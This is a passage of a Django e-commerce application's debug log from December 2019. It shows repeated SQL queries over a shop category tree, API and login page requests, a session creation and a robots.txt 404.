"shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 11:04:39,775 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 11:04:39,779 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 11:04:39] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 11:04:49,877 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 11:04:49,884 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 11:04:49,891 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 11:04:49,896 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 11:04:49,900 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 11:04:49,904 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 11:04:49,908 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 11:04:49,911 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 11:04:49,915 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 11:04:49,919 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 11:04:49,923 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 11:04:49] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [10/Dec/2019 11:05:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 11:05:22,467 utils 32196 139885071562496 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 11:05:22,471 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 11:05:22,474 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 11:05:22,476 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 11:05:22,478 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 11:05:22,480 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 11:05:22,482 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 11:05:22,485 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 11:05:22,488 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 11:05:22,490 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 11:05:22,492 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 11:05:22] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [10/Dec/2019 11:08:36] "GET / HTTP/1.0" 302 0 [10/Dec/2019 11:09:32] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 11:09:33,304 utils 32196 139885071562496 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '2ckc5i2k3grqh44nrzf18sqgfjn90eqm' LIMIT 1; args=('2ckc5i2k3grqh44nrzf18sqgfjn90eqm',) DEBUG 2019-12-10 11:09:33,306 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('2ckc5i2k3grqh44nrzf18sqgfjn90eqm', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-24T11:09:33.305351+00:00'::timestamptz); args=('2ckc5i2k3grqh44nrzf18sqgfjn90eqm', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 11, 9, 33, 305351, tzinfo=)) [10/Dec/2019 11:09:33] "GET /login/?next= HTTP/1.0" 200 1784 DEBUG 2019-12-10 11:11:25,487 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 11:11:25,495 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 11:11:25,500 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 11:11:25,504 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 11:11:25,508 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 11:11:25,512 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 11:11:25,516 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 11:11:25,520 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 11:11:25,524 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 11:11:25,528 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 11:11:25,532 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 11:11:25] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 11:11:44,603 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 11:11:44,611 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 11:11:44,614 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 11:11:44,616 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 11:11:44,618 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 11:11:44,620 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 11:11:44,622 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 11:11:44,624 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 11:11:44,626 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 11:11:44,628 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 11:11:44,631 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 11:11:44] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 11:11:52,138 utils 32196 139885071562496 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 11:11:52,142 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 11:11:52,145 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 11:11:52,147 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 11:11:52,149 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 11:11:52,151 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 11:11:52,153 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 11:11:52,156 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 11:11:52,158 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 11:11:52,160 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 11:11:52,162 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 11:11:52] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [10/Dec/2019 11:12:45] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [10/Dec/2019 11:13:02] "GET /robots.txt HTTP/1.0" 404 6624 [10/Dec/2019 11:13:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 11:15:02,152 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 11:15:02,160 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 11:15:02,165 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 11:15:02,168 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 11:15:02,172 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 11:15:02,176 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 11:15:02,180 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 11:15:02,184 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 11:15:02,188 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 